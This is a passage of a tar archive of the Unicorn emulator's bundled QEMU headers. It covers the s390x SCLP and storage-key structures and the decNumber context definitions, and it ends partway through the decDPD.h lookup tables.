QEMU_PACK(typedef struct ReadInfo { SCCBHeader h; uint16_t rnmax; uint8_t rnsize; uint8_t _reserved1[16 - 11]; /* 11-15 */ uint16_t entries_cpu; /* 16-17 */ uint16_t offset_cpu; /* 18-19 */ uint8_t _reserved2[24 - 20]; /* 20-23 */ uint8_t loadparm[8]; /* 24-31 */ uint8_t _reserved3[48 - 32]; /* 32-47 */ uint64_t facilities; /* 48-55 */ uint8_t _reserved0[76 - 56]; /* 56-75 */ uint32_t ibc_val; uint8_t conf_char[99 - 80]; /* 80-98 */ uint8_t mha_pow; uint32_t rnsize2; uint64_t rnmax2; uint8_t _reserved6[116 - 112]; /* 112-115 */ uint8_t conf_char_ext[120 - 116]; /* 116-119 */ uint16_t highest_cpu; uint8_t _reserved5[124 - 122]; /* 122-123 */ uint32_t hmfai; struct CPUEntry entries[]; }) ReadInfo; QEMU_PACK(typedef struct ReadCpuInfo { SCCBHeader h; uint16_t nr_configured; /* 8-9 */ uint16_t offset_configured; /* 10-11 */ uint16_t nr_standby; /* 12-13 */ uint16_t offset_standby; /* 14-15 */ uint8_t reserved0[24-16]; /* 16-23 */ struct CPUEntry entries[]; }) ReadCpuInfo; QEMU_PACK(typedef struct ReadStorageElementInfo { SCCBHeader h; uint16_t max_id; uint16_t assigned; uint16_t standby; uint8_t _reserved0[16 - 14]; /* 14-15 */ uint32_t entries[]; }) ReadStorageElementInfo; QEMU_PACK(typedef struct AttachStorageElement { SCCBHeader h; uint8_t _reserved0[10 - 8]; /* 8-9 */ uint16_t assigned; uint8_t _reserved1[16 - 12]; /* 12-15 */ uint32_t entries[]; }) AttachStorageElement; QEMU_PACK(typedef struct AssignStorage { SCCBHeader h; uint16_t rn; }) AssignStorage; QEMU_PACK(typedef struct IoaCfgSccb { SCCBHeader header; uint8_t atype; uint8_t reserved1; uint16_t reserved2; uint32_t aid; }) IoaCfgSccb; QEMU_PACK(typedef struct SCCB { SCCBHeader h; char data[SCCB_DATA_LEN]; }) SCCB; #define TYPE_SCLP "sclp" #define SCLP(obj) OBJECT_CHECK(SCLPDevice, (obj), TYPE_SCLP) #define SCLP_CLASS(oc) OBJECT_CLASS_CHECK(SCLPDeviceClass, (oc), TYPE_SCLP) #define SCLP_GET_CLASS(obj) OBJECT_GET_CLASS(SCLPDeviceClass, (obj), TYPE_SCLP) typedef struct SCLPEventFacility SCLPEventFacility; typedef struct SCLPDevice { /* private */ CPUState parent_obj; SCLPEventFacility *event_facility; int increment_size; /* public */ } SCLPDevice; typedef struct SCLPDeviceClass { /* private */ DeviceClass parent_class; void (*read_SCP_info)(SCLPDevice *sclp, SCCB *sccb); void (*read_cpu_info)(SCLPDevice *sclp, SCCB *sccb); /* public */ void (*execute)(SCLPDevice *sclp, SCCB *sccb, uint32_t code); void (*service_interrupt)(SCLPDevice *sclp, uint32_t sccb); } SCLPDeviceClass; static inline int sccb_data_len(SCCB *sccb) { return be16_to_cpu(sccb->h.length) - 
sizeof(sccb->h); } void s390_sclp_init(void); void sclp_service_interrupt(uint32_t sccb); void raise_irq_cpu_hotplug(void); int sclp_service_call(CPUS390XState *env, uint64_t sccb, uint32_t code); #endif �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/hw/s390x/storage-keys.h��������������������������������������������������0000664�0000000�0000000�00000003462�14675241067�0021675�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * s390 storage key device * * Copyright 2015 IBM Corp. * Author(s): Jason J. Herne <jjherne@linux.vnet.ibm.com> * * This work is licensed under the terms of the GNU GPL, version 2 or (at * your option) any later version. See the COPYING file in the top-level * directory. */ #ifndef S390_STORAGE_KEYS_H #define S390_STORAGE_KEYS_H #include "uc_priv.h" /* #define TYPE_S390_SKEYS "s390-skeys" #define S390_SKEYS(obj) \ OBJECT_CHECK(S390SKeysState, (obj), TYPE_S390_SKEYS) #define S390_CPU(obj) \ OBJECT_CHECK(S390CPU, (obj), TYPE_S390_CPU) #define S390_CPU(obj) ((S390CPU *)obj) */ typedef struct S390SKeysState { //CPUState parent_obj; bool migration_enabled; // Unicorn: Dummy struct member } S390SKeysState; /* #define S390_SKEYS_CLASS(klass) \ OBJECT_CLASS_CHECK(S390SKeysClass, (klass), TYPE_S390_SKEYS) */ #define S390_SKEYS_CLASS(klass) ((S390SKeysClass *)klass) /* #define S390_SKEYS_GET_CLASS(obj) \ OBJECT_GET_CLASS(S390SKeysClass, (obj), TYPE_S390_SKEYS) */ #define S390_SKEYS_GET_CLASS(obj) (((QEMUS390SKeysState *)obj)->class) typedef struct S390SKeysClass { //CPUClass parent_class; int (*skeys_enabled)(S390SKeysState *ks); int (*get_skeys)(S390SKeysState *ks, uint64_t start_gfn, uint64_t count, uint8_t *keys); int (*set_skeys)(S390SKeysState *ks, uint64_t start_gfn, uint64_t count, uint8_t *keys); } S390SKeysClass; #define TYPE_KVM_S390_SKEYS "s390-skeys-kvm" #define TYPE_QEMU_S390_SKEYS "s390-skeys-qemu" #define QEMU_S390_SKEYS(obj) \ (QEMUS390SKeysState*)(obj) typedef struct QEMUS390SKeysState { S390SKeysState parent_obj; uint8_t *keydata; uint32_t key_count; // Unicorn S390SKeysClass *class; } QEMUS390SKeysState; void s390_skeys_init(uc_engine *uc); #endif /* S390_STORAGE_KEYS_H */ 
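/*
 * Usage sketch (an assumption, not part of the original header; shown
 * outside the include guard purely for illustration): reading one storage
 * key through the class vtable, the way target/s390x code reaches the
 * backend via S390_SKEYS_GET_CLASS().
 */
static inline int s390_skeys_get_one(S390SKeysState *ss, uint64_t gfn,
                                     uint8_t *key)
{
    S390SKeysClass *skeyclass = S390_SKEYS_GET_CLASS(ss);

    return skeyclass->get_skeys(ss, gfn, 1, key);
}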
��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/libdecnumber/������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0020231�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/libdecnumber/dconfig.h���������������������������������������������������0000664�0000000�0000000�00000002711�14675241067�0022014�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Configure decNumber for either host or target. Copyright (C) 2008 Free Software Foundation, Inc. This file is part of GCC. GCC is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2, or (at your option) any later version. In addition to the permissions in the GNU General Public License, the Free Software Foundation gives you unlimited permission to link the compiled version of this file into combinations with other programs, and to distribute those combinations without any restriction coming from the use of this file. (The General Public License restrictions do apply in other respects; for example, they cover modification of the file, and distribution when not linked into a combine executable.) GCC is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with GCC; see the file COPYING. If not, write to the Free Software Foundation, 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ #if defined(HOST_WORDS_BIGENDIAN) #define WORDS_BIGENDIAN 1 #else #define WORDS_BIGENDIAN 0 #endif #ifndef DECDPUN #define DECDPUN 3 #endif �������������������������������������������������������unicorn-2.1.1/qemu/include/libdecnumber/decContext.h������������������������������������������������0000664�0000000�0000000�00000025074�14675241067�0022512�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Decimal context header module for the decNumber C Library. Copyright (C) 2005, 2007 Free Software Foundation, Inc. Contributed by IBM Corporation. Author Mike Cowlishaw. This file is part of GCC. 
GCC is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2, or (at your option) any later version. In addition to the permissions in the GNU General Public License, the Free Software Foundation gives you unlimited permission to link the compiled version of this file into combinations with other programs, and to distribute those combinations without any restriction coming from the use of this file. (The General Public License restrictions do apply in other respects; for example, they cover modification of the file, and distribution when not linked into a combine executable.) GCC is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with GCC; see the file COPYING. If not, write to the Free Software Foundation, 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ /* ------------------------------------------------------------------ */ /* Decimal Context module header */ /* ------------------------------------------------------------------ */ /* */ /* Context variables must always have valid values: */ /* */ /* status -- [any bits may be cleared, but not set, by user] */ /* round -- must be one of the enumerated rounding modes */ /* */ /* The following variables are implied for fixed size formats (i.e., */ /* they are ignored) but should still be set correctly in case used */ /* with decNumber functions: */ /* */ /* clamp -- must be either 0 or 1 */ /* digits -- must be in the range 1 through 999999999 */ /* emax -- must be in the range 0 through 999999999 */ /* emin -- must be in the range 0 through -999999999 */ /* extended -- must be either 0 or 1 [present only if DECSUBSET] */ /* traps -- only defined bits may be set */ /* */ /* ------------------------------------------------------------------ */ #ifndef DECCONTEXT_H #define DECCONTEXT_H #define DECCNAME "decContext" /* Short name */ #define DECCFULLNAME "Decimal Context Descriptor" /* Verbose name */ #define DECCAUTHOR "Mike Cowlishaw" /* Who to blame */ /* Extended flags setting -- set this to 0 to use only IEEE flags */ #define DECEXTFLAG 1 /* 1=enable extended flags */ /* Conditional code flag -- set this to 0 for best performance */ #define DECSUBSET 0 /* 1=enable subset arithmetic */ /* Context for operations, with associated constants */ enum rounding { DEC_ROUND_CEILING, /* round towards +infinity */ DEC_ROUND_UP, /* round away from 0 */ DEC_ROUND_HALF_UP, /* 0.5 rounds up */ DEC_ROUND_HALF_EVEN, /* 0.5 rounds to nearest even */ DEC_ROUND_HALF_DOWN, /* 0.5 rounds down */ DEC_ROUND_DOWN, /* round towards 0 (truncate) */ DEC_ROUND_FLOOR, /* round towards -infinity */ DEC_ROUND_05UP, /* round for reround */ DEC_ROUND_MAX /* enum must be less than this */ }; #define DEC_ROUND_DEFAULT DEC_ROUND_HALF_EVEN; typedef struct { int32_t digits; /* working precision */ int32_t emax; /* maximum positive exponent */ int32_t emin; /* minimum negative exponent */ enum rounding round; /* rounding mode */ uint32_t traps; /* trap-enabler flags */ uint32_t status; /* status flags */ uint8_t clamp; /* flag: apply IEEE exponent clamp */ #if DECSUBSET uint8_t extended; /* flag: special-values allowed */ #endif } decContext; /* Maxima and Minima for context settings */ #define DEC_MAX_DIGITS 
999999999 #define DEC_MIN_DIGITS 1 #define DEC_MAX_EMAX 999999999 #define DEC_MIN_EMAX 0 #define DEC_MAX_EMIN 0 #define DEC_MIN_EMIN -999999999 #define DEC_MAX_MATH 999999 /* max emax, etc., for math funcs. */ /* Classifications for decimal numbers, aligned with 754r (note */ /* that 'normal' and 'subnormal' are meaningful only with a */ /* decContext or a fixed size format). */ enum decClass { DEC_CLASS_SNAN, DEC_CLASS_QNAN, DEC_CLASS_NEG_INF, DEC_CLASS_NEG_NORMAL, DEC_CLASS_NEG_SUBNORMAL, DEC_CLASS_NEG_ZERO, DEC_CLASS_POS_ZERO, DEC_CLASS_POS_SUBNORMAL, DEC_CLASS_POS_NORMAL, DEC_CLASS_POS_INF }; /* Strings for the decClasses */ #define DEC_ClassString_SN "sNaN" #define DEC_ClassString_QN "NaN" #define DEC_ClassString_NI "-Infinity" #define DEC_ClassString_NN "-Normal" #define DEC_ClassString_NS "-Subnormal" #define DEC_ClassString_NZ "-Zero" #define DEC_ClassString_PZ "+Zero" #define DEC_ClassString_PS "+Subnormal" #define DEC_ClassString_PN "+Normal" #define DEC_ClassString_PI "+Infinity" #define DEC_ClassString_UN "Invalid" /* Trap-enabler and Status flags (exceptional conditions), and */ /* their names. The top byte is reserved for internal use */ #if DECEXTFLAG /* Extended flags */ #define DEC_Conversion_syntax 0x00000001 #define DEC_Division_by_zero 0x00000002 #define DEC_Division_impossible 0x00000004 #define DEC_Division_undefined 0x00000008 #define DEC_Insufficient_storage 0x00000010 /* [when malloc fails] */ #define DEC_Inexact 0x00000020 #define DEC_Invalid_context 0x00000040 #define DEC_Invalid_operation 0x00000080 #if DECSUBSET #define DEC_Lost_digits 0x00000100 #endif #define DEC_Overflow 0x00000200 #define DEC_Clamped 0x00000400 #define DEC_Rounded 0x00000800 #define DEC_Subnormal 0x00001000 #define DEC_Underflow 0x00002000 #else /* IEEE flags only */ #define DEC_Conversion_syntax 0x00000010 #define DEC_Division_by_zero 0x00000002 #define DEC_Division_impossible 0x00000010 #define DEC_Division_undefined 0x00000010 #define DEC_Insufficient_storage 0x00000010 /* [when malloc fails] */ #define DEC_Inexact 0x00000001 #define DEC_Invalid_context 0x00000010 #define DEC_Invalid_operation 0x00000010 #if DECSUBSET #define DEC_Lost_digits 0x00000000 #endif #define DEC_Overflow 0x00000008 #define DEC_Clamped 0x00000000 #define DEC_Rounded 0x00000000 #define DEC_Subnormal 0x00000000 #define DEC_Underflow 0x00000004 #endif /* IEEE 854 groupings for the flags */ /* [DEC_Clamped, DEC_Lost_digits, DEC_Rounded, and DEC_Subnormal */ /* are not in IEEE 854] */ #define DEC_IEEE_854_Division_by_zero (DEC_Division_by_zero) #if DECSUBSET #define DEC_IEEE_854_Inexact (DEC_Inexact | DEC_Lost_digits) #else #define DEC_IEEE_854_Inexact (DEC_Inexact) #endif #define DEC_IEEE_854_Invalid_operation (DEC_Conversion_syntax | \ DEC_Division_impossible | \ DEC_Division_undefined | \ DEC_Insufficient_storage | \ DEC_Invalid_context | \ DEC_Invalid_operation) #define DEC_IEEE_854_Overflow (DEC_Overflow) #define DEC_IEEE_854_Underflow (DEC_Underflow) /* flags which are normally errors (result is qNaN, infinite, or 0) */ #define DEC_Errors (DEC_IEEE_854_Division_by_zero | \ DEC_IEEE_854_Invalid_operation | \ DEC_IEEE_854_Overflow | DEC_IEEE_854_Underflow) /* flags which cause a result to become qNaN */ #define DEC_NaNs DEC_IEEE_854_Invalid_operation /* flags which are normally for information only (finite results) */ #if DECSUBSET #define DEC_Information (DEC_Clamped | DEC_Rounded | DEC_Inexact \ | DEC_Lost_digits) #else #define DEC_Information (DEC_Clamped | DEC_Rounded | DEC_Inexact) #endif /* Name strings for 
the exceptional conditions */ #define DEC_Condition_CS "Conversion syntax" #define DEC_Condition_DZ "Division by zero" #define DEC_Condition_DI "Division impossible" #define DEC_Condition_DU "Division undefined" #define DEC_Condition_IE "Inexact" #define DEC_Condition_IS "Insufficient storage" #define DEC_Condition_IC "Invalid context" #define DEC_Condition_IO "Invalid operation" #if DECSUBSET #define DEC_Condition_LD "Lost digits" #endif #define DEC_Condition_OV "Overflow" #define DEC_Condition_PA "Clamped" #define DEC_Condition_RO "Rounded" #define DEC_Condition_SU "Subnormal" #define DEC_Condition_UN "Underflow" #define DEC_Condition_ZE "No status" #define DEC_Condition_MU "Multiple status" #define DEC_Condition_Length 21 /* length of the longest string, */ /* including terminator */ /* Initialization descriptors, used by decContextDefault */ #define DEC_INIT_BASE 0 #define DEC_INIT_DECIMAL32 32 #define DEC_INIT_DECIMAL64 64 #define DEC_INIT_DECIMAL128 128 /* Synonyms */ #define DEC_INIT_DECSINGLE DEC_INIT_DECIMAL32 #define DEC_INIT_DECDOUBLE DEC_INIT_DECIMAL64 #define DEC_INIT_DECQUAD DEC_INIT_DECIMAL128 /* decContext routines */ extern decContext * decContextClearStatus(decContext *, uint32_t); extern decContext * decContextDefault(decContext *, int32_t); extern enum rounding decContextGetRounding(decContext *); extern uint32_t decContextGetStatus(decContext *); extern decContext * decContextRestoreStatus(decContext *, uint32_t, uint32_t); extern uint32_t decContextSaveStatus(decContext *, uint32_t); extern decContext * decContextSetRounding(decContext *, enum rounding); extern decContext * decContextSetStatus(decContext *, uint32_t); extern decContext * decContextSetStatusFromString(decContext *, const char *); extern decContext * decContextSetStatusFromStringQuiet(decContext *, const char *); extern decContext * decContextSetStatusQuiet(decContext *, uint32_t); extern const char * decContextStatusToString(const decContext *); extern uint32_t decContextTestSavedStatus(uint32_t, uint32_t); extern uint32_t decContextTestStatus(decContext *, uint32_t); extern decContext * decContextZeroStatus(decContext *); #endif ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/libdecnumber/decDPD.h����������������������������������������������������0000664�0000000�0000000�00000264105�14675241067�0021475�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Conversion lookup tables for the decNumber C Library. Copyright (C) 2007 Free Software Foundation, Inc. Contributed by IBM Corporation. Author Mike Cowlishaw. This file is part of GCC. GCC is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2, or (at your option) any later version. 
In addition to the permissions in the GNU General Public License, the Free Software Foundation gives you unlimited permission to link the compiled version of this file into combinations with other programs, and to distribute those combinations without any restriction coming from the use of this file. (The General Public License restrictions do apply in other respects; for example, they cover modification of the file, and distribution when not linked into a combine executable.) GCC is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with GCC; see the file COPYING. If not, write to the Free Software Foundation, 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ /* ------------------------------------------------------------------------ */ /* Binary Coded Decimal and Densely Packed Decimal conversion lookup tables */ /* [Automatically generated -- do not edit. 2007.05.05] */ /* ------------------------------------------------------------------------ */ /* ------------------------------------------------------------------------ */ /* For details, see: http://www2.hursley.ibm.com/decimal/DPDecimal.html */ /* This include file defines several DPD and BCD conversion tables: */ /* */ /* uint16_t BCD2DPD[2458]; -- BCD -> DPD (0x999 => 2457) */ /* uint16_t BIN2DPD[1000]; -- Bin -> DPD (999 => 2457) */ /* uint8_t BIN2CHAR[4001]; -- Bin -> CHAR (999 => '\3' '9' '9' '9') */ /* uint8_t BIN2BCD8[4000]; -- Bin -> bytes (999 => 9 9 9 3) */ /* uint16_t DPD2BCD[1024]; -- DPD -> BCD (0x3FF => 0x999) */ /* uint16_t DPD2BIN[1024]; -- DPD -> BIN (0x3FF => 999) */ /* uint32_t DPD2BINK[1024]; -- DPD -> BIN * 1000 (0x3FF => 999000) */ /* uint32_t DPD2BINM[1024]; -- DPD -> BIN * 1E+6 (0x3FF => 999000000) */ /* uint8_t DPD2BCD8[4096]; -- DPD -> bytes (x3FF => 9 9 9 3) */ /* */ /* In all cases the result (10 bits or 12 bits, or binary) is right-aligned */ /* in the table entry. BIN2CHAR entries are a single byte length (0 for */ /* value 0) followed by three digit characters; a trailing terminator is */ /* included to allow 4-char moves always. BIN2BCD8 and DPD2BCD8 entries */ /* are similar with the three BCD8 digits followed by a one-byte length */ /* (again, length=0 for value 0). */ /* */ /* To use a table, its name, prefixed with DEC_, must be defined with a */ /* value of 1 before this header file is included. For example: */ /* #define DEC_BCD2DPD 1 */ /* This mechanism allows software to only include tables that are needed. 
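 *
 * For example (a sketch; the include path may differ per build setup), a
 * translation unit that only needs the DPD -> binary direction would do:
 *
 *     #define DEC_DPD2BIN 1
 *     #include "libdecnumber/decDPD.h"
 *
 * and then decode a declet with: uint16_t d = DPD2BIN[dpd & 0x3FF];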
*/ /* ------------------------------------------------------------------------ */ #if defined(DEC_BCD2DPD) && DEC_BCD2DPD==1 && !defined(DECBCD2DPD) #define DECBCD2DPD const uint16_t BCD2DPD[2458]={ 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 0, 0, 0, 0, 0, 0, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 0, 0, 0, 0, 0, 0, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 0, 0, 0, 0, 0, 0, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 0, 0, 0, 0, 0, 0, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 0, 0, 0, 0, 0, 0, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 0, 0, 0, 0, 0, 0, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 0, 0, 0, 0, 0, 0, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 0, 0, 0, 0, 0, 0, 10, 11, 42, 43, 74, 75, 106, 107, 78, 79, 0, 0, 0, 0, 0, 0, 26, 27, 58, 59, 90, 91, 122, 123, 94, 95, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 128, 129, 130, 131, 132, 133, 134, 135, 136, 137, 0, 0, 0, 0, 0, 0, 144, 145, 146, 147, 148, 149, 150, 151, 152, 153, 0, 0, 0, 0, 0, 0, 160, 161, 162, 163, 164, 165, 166, 167, 168, 169, 0, 0, 0, 0, 0, 0, 176, 177, 178, 179, 180, 181, 182, 183, 184, 185, 0, 0, 0, 0, 0, 0, 192, 193, 194, 195, 196, 197, 198, 199, 200, 201, 0, 0, 0, 0, 0, 0, 208, 209, 210, 211, 212, 213, 214, 215, 216, 217, 0, 0, 0, 0, 0, 0, 224, 225, 226, 227, 228, 229, 230, 231, 232, 233, 0, 0, 0, 0, 0, 0, 240, 241, 242, 243, 244, 245, 246, 247, 248, 249, 0, 0, 0, 0, 0, 0, 138, 139, 170, 171, 202, 203, 234, 235, 206, 207, 0, 0, 0, 0, 0, 0, 154, 155, 186, 187, 218, 219, 250, 251, 222, 223, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 256, 257, 258, 259, 260, 261, 262, 263, 264, 265, 0, 0, 0, 0, 0, 0, 272, 273, 274, 275, 276, 277, 278, 279, 280, 281, 0, 0, 0, 0, 0, 0, 288, 289, 290, 291, 292, 293, 294, 295, 296, 297, 0, 0, 0, 0, 0, 0, 304, 305, 306, 307, 308, 309, 310, 311, 312, 313, 0, 0, 0, 0, 0, 0, 320, 321, 322, 323, 324, 325, 326, 327, 328, 329, 0, 0, 0, 0, 0, 0, 336, 337, 338, 339, 340, 341, 342, 343, 344, 345, 0, 0, 0, 0, 0, 0, 352, 353, 354, 355, 356, 357, 358, 359, 360, 361, 0, 0, 0, 0, 0, 0, 368, 369, 370, 371, 372, 373, 374, 375, 376, 377, 0, 0, 0, 0, 0, 0, 266, 267, 298, 299, 330, 331, 362, 363, 334, 335, 0, 0, 0, 0, 0, 0, 282, 283, 314, 315, 346, 347, 378, 379, 350, 351, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 384, 385, 386, 387, 388, 389, 390, 391, 392, 393, 0, 0, 0, 0, 0, 0, 400, 401, 402, 403, 404, 405, 406, 407, 408, 409, 0, 0, 0, 0, 0, 0, 416, 417, 418, 419, 420, 421, 422, 423, 424, 425, 0, 0, 0, 0, 0, 0, 432, 433, 434, 435, 436, 437, 438, 439, 440, 441, 0, 0, 0, 0, 0, 0, 448, 449, 450, 451, 452, 453, 454, 455, 456, 457, 0, 0, 0, 0, 0, 0, 464, 465, 466, 467, 468, 469, 470, 471, 472, 473, 0, 0, 0, 0, 0, 0, 480, 481, 482, 483, 484, 485, 486, 487, 488, 489, 0, 0, 0, 0, 0, 0, 496, 497, 498, 499, 500, 501, 502, 503, 504, 505, 0, 0, 0, 0, 0, 
0, 394, 395, 426, 427, 458, 459, 490, 491, 462, 463, 0, 0, 0, 0, 0, 0, 410, 411, 442, 443, 474, 475, 506, 507, 478, 479, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 512, 513, 514, 515, 516, 517, 518, 519, 520, 521, 0, 0, 0, 0, 0, 0, 528, 529, 530, 531, 532, 533, 534, 535, 536, 537, 0, 0, 0, 0, 0, 0, 544, 545, 546, 547, 548, 549, 550, 551, 552, 553, 0, 0, 0, 0, 0, 0, 560, 561, 562, 563, 564, 565, 566, 567, 568, 569, 0, 0, 0, 0, 0, 0, 576, 577, 578, 579, 580, 581, 582, 583, 584, 585, 0, 0, 0, 0, 0, 0, 592, 593, 594, 595, 596, 597, 598, 599, 600, 601, 0, 0, 0, 0, 0, 0, 608, 609, 610, 611, 612, 613, 614, 615, 616, 617, 0, 0, 0, 0, 0, 0, 624, 625, 626, 627, 628, 629, 630, 631, 632, 633, 0, 0, 0, 0, 0, 0, 522, 523, 554, 555, 586, 587, 618, 619, 590, 591, 0, 0, 0, 0, 0, 0, 538, 539, 570, 571, 602, 603, 634, 635, 606, 607, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 640, 641, 642, 643, 644, 645, 646, 647, 648, 649, 0, 0, 0, 0, 0, 0, 656, 657, 658, 659, 660, 661, 662, 663, 664, 665, 0, 0, 0, 0, 0, 0, 672, 673, 674, 675, 676, 677, 678, 679, 680, 681, 0, 0, 0, 0, 0, 0, 688, 689, 690, 691, 692, 693, 694, 695, 696, 697, 0, 0, 0, 0, 0, 0, 704, 705, 706, 707, 708, 709, 710, 711, 712, 713, 0, 0, 0, 0, 0, 0, 720, 721, 722, 723, 724, 725, 726, 727, 728, 729, 0, 0, 0, 0, 0, 0, 736, 737, 738, 739, 740, 741, 742, 743, 744, 745, 0, 0, 0, 0, 0, 0, 752, 753, 754, 755, 756, 757, 758, 759, 760, 761, 0, 0, 0, 0, 0, 0, 650, 651, 682, 683, 714, 715, 746, 747, 718, 719, 0, 0, 0, 0, 0, 0, 666, 667, 698, 699, 730, 731, 762, 763, 734, 735, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 768, 769, 770, 771, 772, 773, 774, 775, 776, 777, 0, 0, 0, 0, 0, 0, 784, 785, 786, 787, 788, 789, 790, 791, 792, 793, 0, 0, 0, 0, 0, 0, 800, 801, 802, 803, 804, 805, 806, 807, 808, 809, 0, 0, 0, 0, 0, 0, 816, 817, 818, 819, 820, 821, 822, 823, 824, 825, 0, 0, 0, 0, 0, 0, 832, 833, 834, 835, 836, 837, 838, 839, 840, 841, 0, 0, 0, 0, 0, 0, 848, 849, 850, 851, 852, 853, 854, 855, 856, 857, 0, 0, 0, 0, 0, 0, 864, 865, 866, 867, 868, 869, 870, 871, 872, 873, 0, 0, 0, 0, 0, 0, 880, 881, 882, 883, 884, 885, 886, 887, 888, 889, 0, 0, 0, 0, 0, 0, 778, 779, 810, 811, 842, 843, 874, 875, 846, 847, 0, 0, 0, 